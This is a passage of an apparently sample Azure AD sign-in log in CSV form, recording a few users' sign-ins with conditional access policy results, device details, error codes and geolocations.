Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:51,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",2ce0403b-1665-483a-827f-e759ebf12b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2ce0403b-1665-483a-827f-e759ebf12b00,SigninLogs,Sucess,32.32146072,34.85319901
+288,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:14.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,fcffe835-b94b-4ea3-828a-c627f7ac27b5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f2dad20e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1dbd81fd-18f7-4582-ba72-d8f2dad20e00,SigninLogs,Failed,41.90428925,-85.99833679
+289,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:04.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6fbac2e0-aa3c-4898-a8e4-0ebae3a75efb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda3d2a0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c95450b3-582d-4306-9dd2-9bda3d2a0e00,SigninLogs,Sucess,41.90428925,-85.99833679
+290,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:54.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",34805c5b-6a36-487d-9189-7bc13aca0e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,34805c5b-6a36-487d-9189-7bc13aca0e00,SigninLogs,Sucess,33.0175209,35.44601059
+291,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:09.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8bbf24ff-5ca2-46a0-9994-4313ee584c7e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e555e9d8-8e19-4918-91cf-fdbcf8741200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,e555e9d8-8e19-4918-91cf-fdbcf8741200,SigninLogs,Sucess,41.90428925,-85.99833679
+292,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d736ac59-793a-44b3-96f9-cb398477fe8a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cbffb959-9fbe-4abe-95ed-0d8530491400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbffb959-9fbe-4abe-95ed-0d8530491400,SigninLogs,Sucess,36.6404686,-78.26995087
+293,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d75a1c7c-f644-4a2d-bfb0-9132d57b7189,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",a26127b0-0de6-4c21-8918-00e61a800000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,a26127b0-0de6-4c21-8918-00e61a800000,SigninLogs,Sucess,32.32146072,34.85319901
+294,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:48.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76fca1e7-e01d-497f-b0df-bc6a4e7b1131,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",4445394f-bc55-4988-8502-680d27a21400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,4445394f-bc55-4988-8502-680d27a21400,SigninLogs,Sucess,50.6406517,5.572050095
